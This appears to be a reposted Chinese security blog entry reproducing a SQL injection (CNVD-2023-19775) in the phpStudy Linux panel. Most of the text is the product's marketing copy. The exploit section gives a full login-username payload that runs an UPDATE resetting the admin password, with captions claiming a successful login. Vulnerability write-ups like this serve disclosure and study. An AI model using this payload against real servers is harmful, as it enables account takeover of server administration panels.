xi
水一段:
phpStudy Linux 面板是什么
phpStudy Linux 面板是由phpStudy官方团队(xp.cn)针对Linux服务器推出的一款服务器环境搭建以及管理工具。
注意:phpStudy 针对Linux服务器集成环境一共推出过两款软件,本软件为
phpStudy Linux 面板,是最近刚刚推出的最新版;另一款是phpStudy for Linux 2014版本 是比较老的产品了,具体可参考:https://www.xp.cn/linux.html
phpStudy Linux 面板特色
-
所有软件免费:phpStudy是一个知名老牌的服务器集成环境工具,我们一直秉承免费公益的理念,帮助广大站长方便、快速的搭建服务器环境。2019年我们新推出的面板继续免费,所有的软件安装全部免费。
-
可视化快速部署:“让天下没有难配的服务器环境!”这是我们的产品理念,本phpStudy Linux 面板支持可视化安装、搭建WEB服务器环境,包含各种功能配置,非常方便、快捷!
-
功能齐全:包含安装WEB环境所必须的“LAMP”或者“LNMP”软件,另外包括WEB的配置、安全的配置、监控报表、文件管理、操作日志等,功能还在不断的增加中!
-
高效运维:通过可视化的web端面板可以轻松部署和管理上百个网站,另外可以时刻监控服务器和网站的运行情况,提升运维效率!
-
安全稳定、不断更新:网站三天两头的打不开或者被黑等是运维们最头疼的,所以为了确保服务器环境的安全稳定运行,phpStudy团队在不断的更新维护!
漏洞细节建议看视频。
用户名处注入更新密码:
admin';UPDATE ADMINS set PASSWORD = '67f43efc5701784db1504e4993d7e393' where username = 'admin';-- 正常情况:
注入:
成功登录
参考:https://www.bilibili.com/video/BV1Yc411j7TP
ps:显然,良心dada,建议报名~
原文始发于微信公众号(蓝猫Sec):CNVD-2023-19775--phpstudy-Linux用户名sql注入复现
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论